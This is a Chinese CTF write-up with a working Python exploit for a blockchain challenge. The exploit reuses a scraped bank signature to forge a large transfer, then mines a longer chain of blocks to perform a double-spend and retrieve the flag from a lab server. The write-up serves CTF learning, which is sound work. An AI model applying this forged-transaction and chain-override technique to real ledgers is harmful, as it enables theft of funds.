这题是区块链题，对区块链不是很了解，想了解原理的建议看这一篇

https://blog.csdn.net/hxhxhxhxx/article/details/108111692

简单介绍一下双花攻击的原理吧，就是区块链是去中心化账本，而且默认长度最长的是主链

如果用户自持有的账本长度大于中心化中心的账本，那么所有的节点都会以当前用户的账本覆盖当前持有的账本，这边是0确认，

就是整个链里就你一个人，所以没有人跟你竞争，所以一定会成功。具体的也不清楚，直接看大佬的脚本吧

具体要改的就是url的三个参数和三个addr

简单演示一下

# -*- encoding: utf-8 -*-

# written in python 2.7

import hashlib, json, rsa, uuid, os,requests,re

# 一堆变量常量

url_root="http://111.200.241.244:52910/"

url_create="http://111.200.241.244:52910/create_transaction"

url_flag="http://111.200.241.244:52910/flag"

s=requests.Session()

ddcoin = s.get(url=url_root)

prev_one=re.search(r"hash of genesis block: ([0-9a-f]{64})",ddcoin.content, flags=0).group(1)

bank_utox_id=re.search(r"\&#​34;input\": \[\&#​34;([0-9a-f\-]{36})",ddcoin.content, flags=0).group(1)

bank_signature=re.search(r"\&#​34;signature\": \[\&#​34;([0-9a-f]{96})",ddcoin.content, flags=0).group(1)

DIFFICULTY = int('00000&#​39; + 'f&#​39; * 59, 16)

EMPTY_HASH = '0&#​39;*64

bank_addr="83c1ec7b05a19528bc5520ede1b11c0faf92bc11187497c98a034473aa35c58263026587e4e8bde66bc95437fd73c06b"

hacke_addr="8b70905e184624c3078ba496a9b35ba5a1c5c79f296dfe45c13ff4b9df98b41c064bd810ffc0a230aae8f3d0514053a5"

shop_addr="90a6e1e679ca51b1704c0d4fb47ae64bc3cafde95ddd4486132f4c41b407ce24a3073927fb94a1a8ebc75623329fda85"

# 源码中的API

def hash(x):

    return hashlib.sha256(hashlib.md5(x).digest()).hexdigest()

def hash_reducer(x, y):

    return hash(hash(x)+hash(y))

def hash_block(block):

    return reduce(hash_reducer, [block['prev&#​39;], block['nonce&#​39;], reduce(hash_reducer, [tx['hash&#​39;] for tx in block['transactions&#​39;]], EMPTY_HASH)])

def hash_utxo(utxo):

    return reduce(hash_reducer, [utxo['id&#​39;], utxo['addr&#​39;], str(utxo['amount&#​39;])])

def hash_tx(tx):

    return reduce(hash_reducer, [

        reduce(hash_reducer, tx['input&#​39;], EMPTY_HASH),

        reduce(hash_reducer, [utxo['hash&#​39;] for utxo in tx['output&#​39;]], EMPTY_HASH)

    ])

def create_output_utxo(addr_to, amount):

    utxo = {'id&#​39;: str(uuid.uuid4()), 'addr&#​39;: addr_to, 'amount&#​39;: amount}

    utxo['hash&#​39;] = hash_utxo(utxo)

    return utxo

def create_tx(input_utxo_ids, output_utxo, privkey_from=None):

    tx = {'input&#​39;: input_utxo_ids, 'signature&#​39;:[bank_signature], 'output&#​39;: output_utxo}  # 修改了签名

    tx['hash&#​39;] = hash_tx(tx)

    return tx

def create_block(prev_block_hash, nonce_str, transactions):

    if type(prev_block_hash) != type('&#​39;): raise Exception('prev_block_hash should be hex-encoded hash value')

    nonce = str(nonce_str)

    if len(nonce) > 128: raise Exception('the nonce is too long&#​39;)

    block = {'prev&#​39;: prev_block_hash, 'nonce&#​39;: nonce, 'transactions&#​39;: transactions}

    block['hash&#​39;] = hash_block(block)

    return block

# 构造的方法

def check_hash(prev,tx):

    for i in range(10000000):

        current_block=create_block(prev,str(i),tx)

        block_hash = int(current_block['hash&#​39;], 16)

        if block_hash<DIFFICULTY:

            print json.dumps(current_block)

            return current_block

def create_feak_one():

    utxo_first=create_output_utxo(shop_addr,1000000)

    tx_first=create_tx([bank_utox_id],[utxo_first])

    return check_hash(prev_one,[tx_first])

def create_empty_block(prev):

    return check_hash(prev,[])

# 攻击过程

a=create_feak_one()

print s.post(url=url_create,data=str(json.dumps(a))).content

b=create_empty_block(a['hash&#​39;])

print s.post(url=url_create,data=str(json.dumps(b))).content

c=create_empty_block(b['hash&#​39;])

print s.post(url=url_create,data=str(json.dumps(c))).content

d=create_empty_block(c['hash&#​39;])

print s.post(url=url_create,data=str(json.dumps(d))).content

e=create_empty_block(d['hash&#​39;])

print s.post(url=url_create,data=str(json.dumps(e))).content

print s.get(url=url_flag).content